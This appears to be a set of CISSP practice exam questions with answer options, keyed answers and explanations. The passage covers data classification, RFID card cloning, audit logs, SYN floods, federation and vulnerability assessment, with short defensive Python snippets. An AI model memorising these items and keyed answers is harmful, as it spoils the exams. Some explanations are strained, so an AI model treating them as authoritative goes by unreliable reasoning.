The best description of the responsibilities of a data owner is determining the impact the information has on the mission of the organization. A data owner is a person or entity that has the authority and accountability for the creation, collection, processing, and disposal of a set of data. A data owner is also responsible for defining the purpose, value, and classification of the data, as well as the security requirements and controls for the data. A data owner should be able to determine the impact the information has on the mission of the organization, which means assessing the potential consequences of losing, compromising, or disclosing the data. The impact of the information on the mission of the organization is one of the main criteria for data classification, which helps to establish the appropriate level of protection and handling for the data.
The other options are not the best descriptions of the responsibilities of a data owner, but rather the responsibilities of other roles or functions related to data management. Ensuring quality and validation through periodic audits for ongoing data integrity is a responsibility of a data steward, who is a person or entity that oversees the quality, consistency, and usability of the data. Maintaining fundamental data availability, including data storage and archiving is a responsibility of a data custodian, who is a person or entity that implements and maintains the technical and physical security of the data. Ensuring accessibility to appropriate users, maintaining appropriate levels of data security is a responsibility of a data controller, who is a person or entity that determines the purposes and means of processing the data.
Which one of the following affects the classification of data?
Assigned security label
Multilevel Security (MLS) architecture
Minimum query size
Passage of time
The passage of time is one of the factors that affects the classification of data. Data classification is the process of assigning a level of sensitivity or criticality to data based on its value, impact, and legal requirements. Data classification helps to determine the appropriate security controls and handling procedures for the data. However, data classification is not static, but dynamic, meaning that it can change over time depending on various factors. One of these factors is the passage of time, which can affect the relevance, usefulness, or sensitivity of the data. For example, data that is classified as confidential or secret at one point in time may become obsolete, outdated, or declassified at a later point in time, and thus require a lower level of protection. Conversely, data that is classified as public or unclassified at one point in time may become more valuable, sensitive, or regulated at a later point in time, and thus require a higher level of protection. Therefore, data classification should be reviewed and updated periodically to reflect the changes in the data over time.
The other options are not factors that affect the classification of data, but rather the outcomes or components of data classification. Assigned security label is the result of data classification, which indicates the level of sensitivity or criticality of the data. Multilevel Security (MLS) architecture is a system that supports data classification, which allows different levels of access to data based on the clearance and need-to-know of the users. Minimum query size is a parameter that can be used to enforce data classification, which limits the amount of data that can be retrieved or displayed at a time.
Which of the following is an effective control in preventing electronic cloning of Radio Frequency Identification (RFID) based access cards?
Personal Identity Verification (PIV)
Cardholder Unique Identifier (CHUID) authentication
Physical Access Control System (PACS) repeated attempt detection
Asymmetric Card Authentication Key (CAK) challenge-response
Asymmetric Card Authentication Key (CAK) challenge-response is an effective control in preventing electronic cloning of RFID based access cards. RFID based access cards are contactless cards that use radio frequency identification (RFID) technology to communicate with a reader and grant access to a physical or logical resource. RFID based access cards are vulnerable to electronic cloning, which is the process of copying the data and identity of a legitimate card to a counterfeit card, and using it to impersonate the original cardholder and gain unauthorized access. Asymmetric CAK challenge-response is a cryptographic technique that prevents electronic cloning by using public key cryptography and digital signatures to verify the authenticity and integrity of the card and the reader. It works as follows: the reader sends the card a fresh random challenge, the card signs the challenge with a private key that never leaves the card, and the reader verifies the signature using the card's enrolled public key.
Asymmetric CAK challenge-response prevents electronic cloning because the private keys of the card and the reader are never transmitted or exposed, and the signatures are unique and non-reusable for each transaction. Therefore, a cloned card cannot produce a valid signature without knowing the private key of the original card, and a rogue reader cannot impersonate a legitimate reader without knowing its private key.
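The exchange can be sketched with the Python cryptography package. In a real card deployment the private key is generated and held inside the card's secure element and never appears in host memory:

```python
import os

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

# Card's asymmetric key pair; the private key never leaves the card.
card_private = ec.generate_private_key(ec.SECP256R1())
card_public = card_private.public_key()   # enrolled with the access system

# Reader: issue a fresh random challenge (freshness prevents replay).
challenge = os.urandom(32)

# Card: sign the challenge with its private key.
signature = card_private.sign(challenge, ec.ECDSA(hashes.SHA256()))

# Reader: verify against the enrolled public key; a cloned card that copied
# only the card's stored data cannot produce this signature, so verify()
# raises InvalidSignature for it.
card_public.verify(signature, challenge, ec.ECDSA(hashes.SHA256()))
print("card authenticated")
```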
The other options are not as effective as asymmetric CAK challenge-response in preventing electronic cloning of RFID based access cards. Personal Identity Verification (PIV) is a standard for federal employees and contractors to use smart cards for physical and logical access, but it does not specify the cryptographic technique for RFID based access cards. Cardholder Unique Identifier (CHUID) authentication is a technique that uses a unique number and a digital certificate to identify the card and the cardholder, but it does not prevent replay attacks or verify the reader’s identity. Physical Access Control System (PACS) repeated attempt detection is a technique that monitors and alerts on multiple failed or suspicious attempts to access a resource, but it does not prevent the cloning of the card or the impersonation of the reader.
When implementing a data classification program, why is it important to avoid too much granularity?
The process will require too many resources
It will be difficult to apply to both hardware and software
It will be difficult to assign ownership to the data
The process will be perceived as having value
When implementing a data classification program, it is important to avoid too much granularity, because the process will require too many resources. Data classification is the process of assigning a level of sensitivity or criticality to data based on its value, impact, and legal requirements. Data classification helps to determine the appropriate security controls and handling procedures for the data. However, data classification is not a simple or straightforward process, as it involves many factors, such as the nature, context, and scope of the data, the stakeholders, the regulations, and the standards. If the data classification program has too many levels or categories of data, it will increase the complexity, cost, and time of the process, and reduce the efficiency and effectiveness of the data protection. Therefore, data classification should be done with a balance between granularity and simplicity, and follow the principle of proportionality, which means that the level of protection should be proportional to the level of risk.
The other options are not the main reasons to avoid too much granularity in data classification, but rather the potential challenges or benefits of data classification. It will be difficult to apply to both hardware and software is a challenge of data classification, as it requires consistent and compatible methods and tools for labeling and protecting data across different types of media and devices. It will be difficult to assign ownership to the data is a challenge of data classification, as it requires clear and accountable roles and responsibilities for the creation, collection, processing, and disposal of data. The process will be perceived as having value is a benefit of data classification, as it demonstrates the commitment and awareness of the organization to protect its data assets and comply with its obligations.
In a data classification scheme, the data is owned by the
system security managers
business managers
Information Technology (IT) managers
end users
In a data classification scheme, the data is owned by the business managers. Business managers are the persons or entities that have the authority and accountability for the creation, collection, processing, and disposal of a set of data. Business managers are also responsible for defining the purpose, value, and classification of the data, as well as the security requirements and controls for the data. Business managers should be able to determine the impact the information has on the mission of the organization, which means assessing the potential consequences of losing, compromising, or disclosing the data. The impact of the information on the mission of the organization is one of the main criteria for data classification, which helps to establish the appropriate level of protection and handling for the data.
The other options are not the data owners in a data classification scheme, but rather the other roles or functions related to data management. System security managers are the persons or entities that oversee the security of the information systems and networks that store, process, and transmit the data. They are responsible for implementing and maintaining the technical and physical security of the data, as well as monitoring and auditing the security performance and incidents. Information Technology (IT) managers are the persons or entities that manage the IT resources and services that support the business processes and functions that use the data. They are responsible for ensuring the availability, reliability, and scalability of the IT infrastructure and applications, as well as providing technical support and guidance to the users and stakeholders. End users are the persons or entities that access and use the data for their legitimate purposes and needs. They are responsible for complying with the security policies and procedures for the data, as well as reporting any security issues or violations.
Which of the following is MOST important when assigning ownership of an asset to a department?
The department should report to the business owner
Ownership of the asset should be periodically reviewed
Individual accountability should be ensured
All members should be trained on their responsibilities
When assigning ownership of an asset to a department, the most important factor is to ensure individual accountability for the asset. Individual accountability means that each person who has access to or uses the asset is responsible for its protection and proper handling. Individual accountability also implies that each person who causes or contributes to a security breach or incident involving the asset can be identified and held liable. Individual accountability can be achieved by implementing security controls such as authentication, authorization, auditing, and logging.
The other options are not as important as ensuring individual accountability, as they do not directly address the security risks associated with the asset. The department should report to the business owner is a management issue, not a security issue. Ownership of the asset should be periodically reviewed is a good practice, but it does not prevent misuse or abuse of the asset. All members should be trained on their responsibilities is a preventive measure, but it does not guarantee compliance or enforcement of the responsibilities.
In which of the following programs is it MOST important to include the collection of security process data?
Quarterly access reviews
Security continuous monitoring
Business continuity testing
Annual security training
Security continuous monitoring is the program in which it is most important to include the collection of security process data. Security process data is the data that reflects the performance, effectiveness, and compliance of the security processes, such as the security policies, standards, procedures, and guidelines. Security process data can include metrics, indicators, logs, reports, and assessments. Collecting this data provides the evidence needed to measure, verify, and improve the performance and compliance of those security processes.
Security continuous monitoring is the program in which it is most important to include the collection of security process data, because it is the program that involves maintaining the ongoing awareness of the security status, events, and activities of the system. Security continuous monitoring can enable the system to detect and respond to any security issues or incidents in a timely and effective manner, and to adjust and improve the security controls and processes accordingly. Security continuous monitoring can also help the system to comply with the security requirements and standards from the internal or external authorities or frameworks.
The other options are not the programs in which it is most important to include the collection of security process data, but rather programs that have other objectives or scopes. Quarterly access reviews are programs that involve reviewing and verifying the user accounts and access rights on a quarterly basis. Quarterly access reviews can ensure that the user accounts and access rights are valid, authorized, and up to date, and that any inactive, expired, or unauthorized accounts or rights are removed or revoked. However, quarterly access reviews are not the programs in which it is most important to include the collection of security process data, because they are not focused on the security status, events, and activities of the system, but rather on the user accounts and access rights. Business continuity testing is a program that involves testing and validating the business continuity plan (BCP) and the disaster recovery plan (DRP) of the system. Business continuity testing can ensure that the system can continue or resume its critical functions and operations in case of a disruption or disaster, and that the system can meet the recovery objectives and requirements. However, business continuity testing is not the program in which it is most important to include the collection of security process data, because it is not focused on the security status, events, and activities of the system, but rather on the continuity and recovery of the system. Annual security training is a program that involves providing and updating the security knowledge and skills of the system users and staff on an annual basis. Annual security training can increase the security awareness and competence of the system users and staff, and reduce the human errors or risks that might compromise the system security. However, annual security training is not the program in which it is most important to include the collection of security process data, because it is not focused on the security status, events, and activities of the system, but rather on the security education and training of the system users and staff.
A Virtual Machine (VM) environment has five guest Operating Systems (OS) and provides strong isolation. What MUST an administrator review to audit a user’s access to data files?
Host VM monitor audit logs
Guest OS access controls
Host VM access controls
Guest OS audit logs
Guest OS audit logs are what an administrator must review to audit a user’s access to data files in a VM environment that has five guest OS and provides strong isolation. A VM environment is a system that allows multiple virtual machines (VMs) to run on a single physical machine, each with its own OS and applications, offering benefits such as hardware consolidation, isolation of workloads, and flexible provisioning of systems.
A guest OS is the OS that runs on a VM, which is different from the host OS that runs on the physical machine. A guest OS can have its own security controls and mechanisms, such as access controls, encryption, authentication, and audit logs. Audit logs are records that capture and store the information about the events and activities that occur within a system or a network, such as the access and usage of the data files. Audit logs can provide a reactive and detective layer of security by enabling the monitoring and analysis of the system or network behavior, and facilitating the investigation and response of the incidents.
Guest OS audit logs are what an administrator must review to audit a user’s access to data files in a VM environment that has five guest OS and provides strong isolation, because they can provide the most accurate and relevant information about the user’s actions and interactions with the data files on the VM. Guest OS audit logs can also help the administrator to identify and report any unauthorized or suspicious access or disclosure of the data files, and to recommend or implement any corrective or preventive actions.
The other options are not what an administrator must review to audit a user’s access to data files in a VM environment that has five guest OS and provides strong isolation, but rather what an administrator might review for other purposes or aspects. Host VM monitor audit logs are records that capture and store the information about the events and activities that occur on the host VM monitor, which is the software or hardware component that manages and controls the VMs on the physical machine. Host VM monitor audit logs can provide information about the performance, status, and configuration of the VMs, but they cannot provide information about the user’s access to data files on the VMs. Guest OS access controls are rules and mechanisms that regulate and restrict the access and permissions of the users and processes to the resources and services on the guest OS. Guest OS access controls can provide a proactive and preventive layer of security by enforcing the principles of least privilege, separation of duties, and need to know. However, guest OS access controls are not what an administrator must review to audit a user’s access to data files, but rather what an administrator must configure and implement to protect the data files. Host VM access controls are rules and mechanisms that regulate and restrict the access and permissions of the users and processes to the VMs on the physical machine. Host VM access controls can provide a granular and dynamic layer of security by defining and assigning the roles and permissions according to the organizational structure and policies. However, host VM access controls are not what an administrator must review to audit a user’s access to data files, but rather what an administrator must configure and implement to protect the VMs.
Which of the following is of GREATEST assistance to auditors when reviewing system configurations?
Change management processes
User administration procedures
Operating System (OS) baselines
System backup documentation
Operating System (OS) baselines are of greatest assistance to auditors when reviewing system configurations. OS baselines are standard or reference configurations that define the desired and secure state of an OS, including the settings, parameters, patches, and updates. OS baselines give auditors a fixed, documented point of comparison for detecting configuration drift or unauthorized change.
OS baselines are of greatest assistance to auditors when reviewing system configurations, because they can enable the auditors to evaluate and verify the current and actual state of the OS against the desired and secure state of the OS. OS baselines can also help the auditors to identify and report any gaps, issues, or risks in the OS configurations, and to recommend or implement any corrective or preventive actions.
The other options are not of greatest assistance to auditors when reviewing system configurations, but rather of assistance for other purposes or aspects. Change management processes are processes that ensure that any changes to the system configurations are planned, approved, implemented, and documented in a controlled and consistent manner. Change management processes can improve the security and reliability of the system configurations by preventing or reducing the errors, conflicts, or disruptions that might occur due to the changes. However, change management processes are not of greatest assistance to auditors when reviewing system configurations, because they do not define the desired and secure state of the system configurations, but rather the procedures and controls for managing the changes. User administration procedures are procedures that define the roles, responsibilities, and activities for creating, modifying, deleting, and managing the user accounts and access rights. User administration procedures can enhance the security and accountability of the user accounts and access rights by enforcing the principles of least privilege, separation of duties, and need to know. However, user administration procedures are not of greatest assistance to auditors when reviewing system configurations, because they do not define the desired and secure state of the system configurations, but rather the rules and tasks for administering the users. System backup documentation is documentation that records the information and details about the system backup processes, such as the backup frequency, type, location, retention, and recovery. System backup documentation can increase the availability and resilience of the system by ensuring that the system data and configurations can be restored in case of a loss or damage. However, system backup documentation is not of greatest assistance to auditors when reviewing system configurations, because it does not define the desired and secure state of the system configurations, but rather the backup and recovery of the system configurations.
Which of the following is a PRIMARY benefit of using a formalized security testing report format and structure?
Executive audiences will understand the outcomes of testing and most appropriate next steps for corrective actions to be taken
Technical teams will understand the testing objectives, testing strategies applied, and business risk associated with each vulnerability
Management teams will understand the testing objectives and reputational risk to the organization
Technical and management teams will better understand the testing objectives, results of each test phase, and potential impact levels
Technical and management teams will better understand the testing objectives, results of each test phase, and potential impact levels is the primary benefit of using a formalized security testing report format and structure. Security testing is a process that involves evaluating and verifying the security posture, vulnerabilities, and threats of a system or a network, using various methods and techniques, such as vulnerability assessment, penetration testing, code review, and compliance checks.
A security testing report is a document that summarizes and communicates the findings and recommendations of the security testing process to the relevant stakeholders, such as the technical and management teams. A security testing report can have various formats and structures, depending on the scope, purpose, and audience of the report. However, a formalized security testing report format and structure is one that follows a standard and consistent template, such as the one proposed by the National Institute of Standards and Technology (NIST) in Special Publication 800-115, Technical Guide to Information Security Testing and Assessment. A formalized report typically includes components such as an executive summary, an introduction, the methodology, the results, and a conclusion with recommendations.
Technical and management teams will better understand the testing objectives, results of each test phase, and potential impact levels is the primary benefit of using a formalized security testing report format and structure, because it can ensure that the security testing report is clear, comprehensive, and consistent, and that it provides the relevant and useful information for the technical and management teams to make informed and effective decisions and actions regarding the system or network security.
The other options are not the primary benefits of using a formalized security testing report format and structure, but rather secondary or specific benefits for different audiences or purposes. Executive audiences will understand the outcomes of testing and most appropriate next steps for corrective actions to be taken is a benefit of using a formalized security testing report format and structure, but it is not the primary benefit, because it is more relevant for the executive summary component of the report, which is a brief and high-level overview of the report, rather than the entire report. Technical teams will understand the testing objectives, testing strategies applied, and business risk associated with each vulnerability is a benefit of using a formalized security testing report format and structure, but it is not the primary benefit, because it is more relevant for the methodology and results components of the report, which are more technical and detailed parts of the report, rather than the entire report. Management teams will understand the testing objectives and reputational risk to the organization is a benefit of using a formalized security testing report format and structure, but it is not the primary benefit, because it is more relevant for the introduction and conclusion components of the report, which are more contextual and strategic parts of the report, rather than the entire report.
Which of the following could cause a Denial of Service (DoS) against an authentication system?
Encryption of audit logs
No archiving of audit logs
Hashing of audit logs
Remote access audit logs
Remote access audit logs could cause a Denial of Service (DoS) against an authentication system. A DoS attack is a type of attack that aims to disrupt or degrade the availability or performance of a system or a network by overwhelming it with excessive or malicious traffic or requests. An authentication system is a system that verifies the identity and credentials of the users or entities that want to access the system or network resources or services. An authentication system can use various methods or factors to authenticate the users or entities, such as passwords, tokens, certificates, biometrics, or behavioral patterns.
Remote access audit logs are records that capture and store information about the events and activities that occur when users or entities access the system or network remotely, such as via the internet, VPN, or dial-up. Remote access audit logs can provide a reactive and detective layer of security by enabling the monitoring and analysis of remote access behavior, and by facilitating the investigation of and response to incidents.
Remote access audit logs could cause a DoS against an authentication system, because they could consume a large amount of disk space, memory, or bandwidth on the authentication system, especially if the remote access is frequent, intensive, or malicious. This could affect the performance or functionality of the authentication system, and prevent or delay the legitimate users or entities from accessing the system or network resources or services. For example, an attacker could launch a DoS attack against an authentication system by sending a large number of fake or invalid remote access requests, and generating a large amount of remote access audit logs that fill up the disk space or memory of the authentication system, and cause it to crash or slow down.
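As a hedge against this failure mode, administrators often watch free space on the partition holding the authentication logs. A minimal Python sketch, assuming the logs live under /var/log and using an illustrative 90% threshold:

```python
# Minimal sketch: alert when the partition holding authentication logs is
# nearly full, one mitigation against log-driven resource exhaustion.
# The path and the 90% threshold are illustrative assumptions.
import shutil

def log_partition_usage(path: str = "/var/log") -> float:
    usage = shutil.disk_usage(path)
    return usage.used / usage.total

if log_partition_usage() > 0.90:
    print("WARNING: log partition above 90%, rotate or archive audit logs")
```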
The other options are not the factors that could cause a DoS against an authentication system, but rather the factors that could improve or protect the authentication system. Encryption of audit logs is a technique that involves using a cryptographic algorithm and a key to transform the audit logs into an unreadable or unintelligible format, that can only be reversed or decrypted by authorized parties. Encryption of audit logs can enhance the security and confidentiality of the audit logs by preventing unauthorized access or disclosure of the sensitive information in the audit logs. However, encryption of audit logs could not cause a DoS against an authentication system, because it does not affect the availability or performance of the authentication system, but rather the integrity or privacy of the audit logs. No archiving of audit logs is a practice that involves not storing or transferring the audit logs to a separate or external storage device or location, such as a tape, disk, or cloud. No archiving of audit logs can reduce the security and availability of the audit logs by increasing the risk of loss or damage of the audit logs, and limiting the access or retrieval of the audit logs. However, no archiving of audit logs could not cause a DoS against an authentication system, because it does not affect the availability or performance of the authentication system, but rather the availability or preservation of the audit logs. Hashing of audit logs is a technique that involves using a hash function, such as MD5 or SHA, to generate a fixed-length and unique value, called a hash or a digest, that represents the audit logs. Hashing of audit logs can improve the security and integrity of the audit logs by verifying the authenticity or consistency of the audit logs, and detecting any modification or tampering of the audit logs. However, hashing of audit logs could not cause a DoS against an authentication system, because it does not affect the availability or performance of the authentication system, but rather the integrity or verification of the audit logs.
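For illustration, hashing an audit log for later integrity verification can be as simple as the following sketch. SHA-256 is chosen here (MD5 and SHA-1, mentioned above, are considered weak), and the file path is an assumption:

```python
# Minimal sketch: compute a SHA-256 digest of an audit log so that later
# verification can detect tampering. The file path is illustrative.
import hashlib

def log_digest(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

baseline = log_digest("/var/log/auth.log")
# Store `baseline` out of band; recompute and compare to detect modification.
```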
Why should Open Web Application Security Project (OWASP) Application Security Verification Standards (ASVS) Level 1 be considered a MINIMUM level of protection for any web application?
ASVS Level 1 ensures that applications are invulnerable to OWASP top 10 threats.
Opportunistic attackers will look for any easily exploitable vulnerable applications.
Most regulatory bodies consider ASVS Level 1 as a baseline set of controls for applications.
Securing applications at ASVS Level 1 provides adequate protection for sensitive data.
OWASP Application Security Verification Standards (ASVS) Level 1 is the lowest level of protection for any web application, as it only requires automated verification of the security controls. ASVS Level 1 should be considered a minimum level of protection, because opportunistic attackers will look for any easily exploitable vulnerable applications, and automated verification may not detect all the possible flaws or weaknesses. Option A, ASVS Level 1 ensures that applications are invulnerable to OWASP top 10 threats, is incorrect, as ASVS Level 1 does not guarantee that the applications are immune to the most common web application security risks. Option C, most regulatory bodies consider ASVS Level 1 as a baseline set of controls for applications, is incorrect, as most regulatory bodies require higher levels of verification and assurance for applications that handle sensitive or regulated data. Option D, securing applications at ASVS Level 1 provides adequate protection for sensitive data, is incorrect, as ASVS Level 1 is not sufficient for protecting sensitive data, and higher levels of verification and encryption are needed. References: CISSP practice exam questions and answers | TechTarget, CISSP All-in-One Exam Guide, Eighth Edition
Which of the following should exist in order to perform a security audit?
Industry framework to audit against
External (third-party) auditor
Internal certified auditor
Neutrality of the auditor
The thing that should exist in order to perform a security audit is an industry framework to audit against. A security audit is a systematic and independent examination of the security policies, procedures, controls, and practices of an organization, system, or network, to verify their compliance, effectiveness, and efficiency. A security audit requires an industry framework to audit against, which is a set of standards, guidelines, or best practices that define the security requirements, objectives, and criteria for the audit. An industry framework to audit against can help to establish the scope, methodology, and expectations of the security audit, as well as to measure and report the performance, gaps, and recommendations of the security audit. An industry framework to audit against can also help to ensure the consistency, reliability, and validity of the security audit, as well as to facilitate the comparison, benchmarking, and improvement of the security audit. Some examples of industry frameworks to audit against are ISO/IEC 27001, NIST SP 800-53, COBIT, or CIS Controls. An external (third-party) auditor, an internal certified auditor, and the neutrality of the auditor are not things that should exist in order to perform a security audit. These are some of the factors or attributes that may affect the quality, credibility, and independence of the security audit, but they are not prerequisites or conditions for the security audit. A security audit can be performed by an external or internal auditor, depending on the purpose, scope, and resources of the audit. A security audit can be performed by a certified or non-certified auditor, depending on the qualifications, skills, and experience of the auditor. A security audit should be performed by a neutral or unbiased auditor, to avoid any conflict of interest, influence, or pressure from the auditee or other parties. References: Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 1, Security and Risk Management, page 28. CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, Security Governance Through Principles and Policies, page 29.
Which layer of the Open Systems Interconnection (OSI) model is being targeted in the event of a Synchronization (SYN) flood attack?
Session
Transport
Network
Presentation
A Synchronization (SYN) flood attack is a type of denial-of-service (DoS) attack that exploits the three-way handshake mechanism of the Transmission Control Protocol (TCP), which operates at the transport layer of the Open Systems Interconnection (OSI) model. In a SYN flood attack, the attacker sends a large number of SYN packets to the target server, but does not respond to the SYN-ACK packets sent by the server. This causes the server to exhaust its resources and become unable to accept legitimate requests. The session, network, and presentation layers of the OSI model are not directly involved in this attack. References:
CISSP Official (ISC)2 Practice Tests, 3rd Edition, Domain 4: Communication and Network Security, Question 4.2.1
CISSP CBK, 5th Edition, Chapter 4: Communication and Network Security, Section: Secure Network Architecture and Design
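One rough operational indicator of a SYN flood is a spike in half-open (SYN-RECV) connections. A minimal sketch, assuming a Linux host with the iproute2 ss tool available and an illustrative threshold of 100:

```python
# Minimal sketch: count half-open (SYN-RECV) TCP connections, a rough
# indicator of an in-progress SYN flood. Assumes the `ss` tool exists;
# the threshold of 100 is an illustrative assumption.
import subprocess

out = subprocess.run(
    ["ss", "-tan", "state", "syn-recv"],
    capture_output=True, text=True, check=True,
).stdout
half_open = max(len(out.splitlines()) - 1, 0)  # subtract the header line
if half_open > 100:
    print(f"Possible SYN flood: {half_open} half-open connections")
```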
In Federated Identity Management (FIM), which of the following represents the concept of federation?
Collection of information logically grouped into a single entity
Collection, maintenance, and deactivation of user objects and attributes in one or more systems, directories or applications
Collection of information for common identities in a system
Collection of domains that have established trust among themselves
The concept of federation in Federated Identity Management (FIM) is the collection of domains that have established trust among themselves. A domain is a logical or administrative boundary that defines the scope and authority of an identity provider (IdP) or a service provider (SP). An IdP is an entity that creates, maintains, and verifies the identities and attributes of the users. An SP is an entity that provides services or resources to the users, and relies on the IdP for the authentication and authorization of the users. A federation is a group of domains that have agreed to share and accept the identities and attributes of the users across the domains, based on a common set of policies, standards, and protocols. A federation enables the users to access multiple services or resources from different domains, using a single or federated identity, without having to create or manage multiple accounts or credentials. A federation also enhances the security, privacy, and convenience of the users and the domains, by reducing the identity management overhead and complexity, and by enabling the users to control the disclosure and use of their identity information. References: [CISSP CBK, Fifth Edition, Chapter 5, page 449]; [CISSP Practice Exam – FREE 20 Questions and Answers, Question 18].
Organization A is adding a large collection of confidential data records that it received when it acquired Organization B to its data store. Many of the users and staff from Organization B are no longer available. Which of the following MUST Organization A do to properly classify and secure the acquired data?
Assign data owners from Organization A to the acquired data.
Create placeholder accounts that represent former users from Organization B.
Archive audit records that refer to users from Organization A.
Change the data classification for data acquired from Organization B.
Data ownership is a key concept in data security and classification. Data owners are responsible for defining the value, sensitivity, and classification of the data, as well as the access rights and controls for the data. When Organization A acquires data from Organization B, it should assign data owners from its own organization to the acquired data, so that they can properly classify and secure the data according to Organization A’s policies and standards. Creating placeholder accounts, archiving audit records, or changing the data classification are not sufficient or necessary steps to ensure the security of the acquired data. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 2: Asset Security, page 67; CISSP Official (ISC)2 Practice Tests, Third Edition, Domain 2: Asset Security, Question 2.4, page 76.
Which of the following is the MOST common cause of system or security failures?
Lack of system documentation
Lack of physical security controls
Lack of change control
Lack of logging and monitoring
The most common cause of system or security failures is lack of change control. Change control is a process that ensures that any changes to the system or the environment are authorized, documented, tested, and approved before implementation. Change control helps to prevent errors, conflicts, inconsistencies, and vulnerabilities that may arise from unauthorized or uncontrolled changes. Lack of change control can result in system instability, performance degradation, functionality loss, security breaches, or compliance violations. Lack of system documentation, lack of physical security controls, and lack of logging and monitoring are also potential causes of system or security failures, but they are not as common or as critical as lack of change control. References: CISSP CBK Reference, 5th Edition, Chapter 3, page 145; CISSP All-in-One Exam Guide, 8th Edition, Chapter 3, page 113
Which of the following is the FIRST requirement a data owner should consider before implementing a data retention policy?
Training
Legal
Business
Storage
The first requirement a data owner should consider before implementing a data retention policy is the legal requirement. A data retention policy is a document that defines the rules and procedures for retaining, storing, and disposing of data, based on its type, value, and purpose. A data owner is a person or an entity that has the authority and responsibility for the creation, classification, and management of data. A data owner should consider the legal requirement before implementing a data retention policy, as there may be laws, regulations, or contracts that mandate the minimum or maximum retention periods for certain types of data, as well as the methods and standards for data preservation and destruction. A data owner should also consider the business, storage, and training requirements for implementing a data retention policy, but these are not the first or the most important factors to consider.
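As a simple illustration of turning a legal retention requirement into a control, the sketch below flags files older than an assumed seven-year retention period. The directory and the period are illustrative assumptions, not legal guidance:

```python
# Minimal sketch: flag files past an assumed 7-year retention period.
# Retention lengths vary by jurisdiction and data type; this value is
# an illustrative assumption only.
import time
from pathlib import Path

RETENTION_SECONDS = 7 * 365 * 24 * 3600  # assumed 7-year requirement

def expired_files(root: str):
    cutoff = time.time() - RETENTION_SECONDS
    return [p for p in Path(root).rglob("*")
            if p.is_file() and p.stat().st_mtime < cutoff]

for path in expired_files("/archive/records"):
    print(f"Eligible for review/disposal: {path}")
```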
What is the correct order of execution for security architecture?
Governance, strategy and program management, project delivery, operations
Strategy and program management, governance, project delivery, operations
Governance, strategy and program management, operations, project delivery
Strategy and program management, project delivery, governance, operations
Security architecture is the design and implementation of the security controls, mechanisms, and processes that protect the confidentiality, integrity, and availability of the information and systems of an organization. Security architecture is aligned with the business goals, objectives, and requirements of the organization, and supports the security policies, standards, and guidelines of the organization. Security architecture follows a systematic and structured approach that begins with governance, which establishes the authority, accountability, and direction for security; continues with strategy and program management, which translate that direction into plans, priorities, and resources; proceeds to project delivery, which implements the security controls and solutions; and ends with operations, which run, monitor, and maintain what has been delivered. The correct order of execution is therefore governance, strategy and program management, project delivery, operations.
In fault-tolerant systems, what do rollback capabilities permit?
Restoring the system to a previous functional state
Identifying the error that caused the problem
Allowing the system to operate in a reduced manner
Isolating the error that caused the problem
Fault-tolerant systems are systems that can continue to operate despite the occurrence of faults, errors, or failures in some of their components. Fault-tolerant systems use redundancy, diversity, and error detection and correction mechanisms to achieve high availability, reliability, and resilience. Rollback capabilities are one of the mechanisms that enable fault tolerance, which allow the system to restore itself to a previous functional state before the fault occurred. Rollback capabilities can be implemented using checkpoints, snapshots, backups, or logs that record the state of the system at regular intervals or before critical operations. If a fault is detected, the system can revert to the most recent or closest checkpoint, snapshot, backup, or log that represents a valid and consistent state of the system, and resume its normal operation from there. References: What Is Fault Tolerance? | Creating a Fault-tolerant System, What is Fault Tolerance? | Creating a Fault Tolerant System, Fault Tolerance, RAID - System Resilience and Fault Tolerance, System Resilience, High Availability, QoS, and Fault Tolerance
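The checkpoint/rollback pattern can be shown in a few lines. This is a minimal in-memory sketch; real fault-tolerant systems persist checkpoints durably and validate consistency before resuming:

```python
# Minimal sketch of checkpoint-based rollback: snapshot state before a risky
# operation and restore it if the operation fails. Real systems persist
# checkpoints to durable storage; this in-memory version shows the pattern.
import copy

class Checkpointed:
    def __init__(self, state: dict):
        self.state = state
        self._checkpoint = None

    def checkpoint(self):
        self._checkpoint = copy.deepcopy(self.state)

    def rollback(self):
        if self._checkpoint is not None:
            self.state = copy.deepcopy(self._checkpoint)

system = Checkpointed({"balance": 100})
system.checkpoint()
try:
    system.state["balance"] -= 150
    if system.state["balance"] < 0:
        raise ValueError("invalid state after fault")
except ValueError:
    system.rollback()  # restore the last known-good state
print(system.state)  # {'balance': 100}
```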
A hospital enforces the Code of Fair Information Practices. What practice applies to a patient requesting their medical records from a web portal?
Use limitation
Individual participation
Purpose specification
Collection limitation
Individual participation is the practice that applies to a patient requesting their medical records from a web portal, according to the Code of Fair Information Practices. The Code of Fair Information Practices is a set of principles that govern the collection, use, and protection of personal information, and that aim to ensure the privacy and security of individuals. The Code of Fair Information Practices consists of five principles: collection limitation, data quality, purpose specification, use limitation, and individual participation. Individual participation is the principle that states that individuals should have the right to access, review, correct, or delete their personal information, and to consent or object to the collection, use, or disclosure of their personal information. In the context of a hospital, individual participation means that a patient should be able to request their medical records from a web portal, and to control how their medical records are used or shared by the hospital. The other options are not the practice that applies to a patient requesting their medical records from a web portal, as they either do not involve individual participation, or do not relate to the Code of Fair Information Practices. References: CISSP - Certified Information Systems Security Professional, Domain 1. Security and Risk Management, 1.6 Understand legal and regulatory issues that pertain to information security in a global context, 1.6.3 Understand, adhere to, and promote professional ethics, 1.6.3.1 Code of Fair Information Practices.
A client has reviewed a vulnerability assessment report and has stated it is inaccurate. The client states that the vulnerabilities listed are not valid because the host’s Operating System (OS) was not properly detected.
Where in the vulnerability assessment process did the error MOST likely occur?
Enumeration
Detection
Reporting
Discovery
The error most likely occurred in the discovery phase of the vulnerability assessment process. Discovery is the phase where the assessor identifies the hosts, services, and applications that are present on the target network or system. Discovery can be done using active or passive methods, such as scanning, sniffing, or querying. If the discovery phase is not performed correctly, the assessor may miss some hosts or misidentify their operating systems, which can lead to inaccurate or incomplete results in the subsequent phases of the vulnerability assessment process. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7: Security Operations, page 377. CISSP Practice Exam – FREE 20 Questions and Answers, Question 14.
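To illustrate the discovery phase, an assessor might re-run OS fingerprinting against a disputed host and compare the result with the report. A minimal sketch, assuming the nmap binary is installed, the target address is illustrative, and the scan is authorized (OS detection with -O usually requires root privileges):

```python
# Minimal sketch: re-run OS fingerprinting for one host during discovery.
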